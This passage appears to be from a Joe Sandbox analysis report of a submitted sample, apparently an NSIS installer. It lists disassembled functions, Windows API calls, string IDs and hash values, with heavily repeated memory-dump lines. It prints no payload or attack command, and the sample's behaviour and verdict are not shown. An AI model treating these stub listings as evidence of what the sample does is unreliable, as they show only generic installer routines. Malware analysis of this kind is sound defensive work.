                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeGloballstrcpyn
                                                                                                • String ID: 232$Exch: stack < %d elements$Pop: stack empty
                                                                                                • API String ID: 1459762280-3464832006
                                                                                                • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                                                                                • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 764 402713-40273b call 406035 * 2 769 402746-402749 764->769 770 40273d-402743 call 40145c 764->770 772 402755-402758 769->772 773 40274b-402752 call 40145c 769->773 770->769 776 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 772->776 777 40275a-402761 call 40145c 772->777 773->772 777->776
                                                                                                APIs
                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                • String ID: 232$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                • API String ID: 247603264-3569438738
                                                                                                • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 785 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 796 402223-4030f2 call 4062cf 785->796 797 40220d-40221b call 4062cf 785->797 797->796
                                                                                                APIs
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004255E0,771B23A0,00000000), ref: 00404FD6
                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FE6
                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004255E0,771B23A0,00000000), ref: 00404FF9
                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                Strings
                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                • API String ID: 3156913733-2180253247
                                                                                                • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 805 405eab-405eb7 806 405eb8-405eec GetTickCount GetTempFileNameW 805->806 807 405efb-405efd 806->807 808 405eee-405ef0 806->808 810 405ef5-405ef8 807->810 808->806 809 405ef2 808->809 809->810
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: nsa
                                                                                                • API String ID: 1716503409-2209301699
                                                                                                • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 811 402175-40218b call 401446 * 2 816 402198-40219d 811->816 817 40218d-402197 call 4062cf 811->817 818 4021aa-4021b0 EnableWindow 816->818 819 40219f-4021a5 ShowWindow 816->819 817->816 821 4030e3-4030f2 818->821 819->821
                                                                                                APIs
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                • String ID: HideWindow
                                                                                                • API String ID: 1249568736-780306582
                                                                                                • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate
                                                                                                • String ID:
                                                                                                • API String ID: 415043291-0
                                                                                                • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                • String ID:
                                                                                                • API String ID: 4115351271-0
                                                                                                • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1383001586.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1382981291.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383020583.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383045014.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1383192744.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_OR8Ti8rf8h.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                Memory Dump Source
